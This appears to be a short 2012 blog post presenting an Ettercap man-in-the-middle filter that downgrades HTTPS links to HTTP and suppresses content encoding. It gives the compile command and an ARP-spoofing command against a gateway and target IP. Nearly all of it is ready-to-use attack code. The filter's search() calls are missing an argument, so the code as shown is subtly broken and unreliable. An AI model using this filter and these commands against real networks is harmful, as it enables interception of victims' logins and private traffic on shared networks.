
Friday, May 11, 2012

Downgrade HTTPS to HTTP :: Ettercap filters MITM

MITM :: MITM attacks are pretty easy to perform on a local network but the tools tend to crash a LOT. Cain (Windows) is a little more stable than Ettercap but I prefer it over Cain because it doesn’t spoof SSL that I consider too loud depending on the attack. NOTE: Ettercap runs better on text mode. Getting things done :: Here is the FILTER.
## # # This filter will substitute the word 'https' with 'http' on # both HTTP requests and responses. # # based on the discussion (and contained code) on forum thread # # ## ########################## ## Zap Content Encoding ## ########################## if (ip.proto == TCP && tcp.dst == 80) { if (search(, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); # note: replacement string is same length as original string msg("[HTTP Response Filter] Encoding zapped.\n"); } } ##################### ## Replace Content ## ##################### ## # Requests if (ip.proto == TCP && tcp.dst == 80) { # msg("[HTTP Response Filter] HTTP request seen.\n"); if (search(, "https")){ replace("https", "http"); msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n"); } if (search(, "https")){ replace("https", "http"); msg("[HTTP Response Filter] *** HTTPS ZAPPED from request\n"); } } ## # Response if (ip.proto == TCP && tcp.src == 80) { # msg("[HTTP Response Filter] HTTP response seen.\n"); if (search(, "https")){ replace("https", "http"); msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n"); } if (search(, "https")){ replace("https", "http"); msg("[HTTP Response Filter] *** HTTPS ZAPPED from response\n"); } }
Just place it in HTTPS.FILTER, then compile it using "etterfilter" with the command : etterfilter https.filter -o https.ef Then You good to go with : ettercap -T -q -F https.ef -M ARP:remote /GATEWAY/ /TARGET_IP/ .

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